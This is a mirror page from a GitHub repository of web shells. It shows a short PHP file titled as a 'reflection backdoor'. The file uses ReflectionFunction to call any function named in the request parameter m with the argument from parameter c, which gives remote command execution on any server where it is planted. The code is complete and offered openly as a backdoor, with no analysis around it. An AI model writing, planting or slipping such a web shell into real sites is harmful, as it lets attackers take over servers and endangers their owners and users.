1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-07 21:31:29 +00:00
Files
webshell/php/p2j/PHP反射后门.php.txt
2014-07-28 09:57:19 +08:00

5 lines
100 B
Plaintext

<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>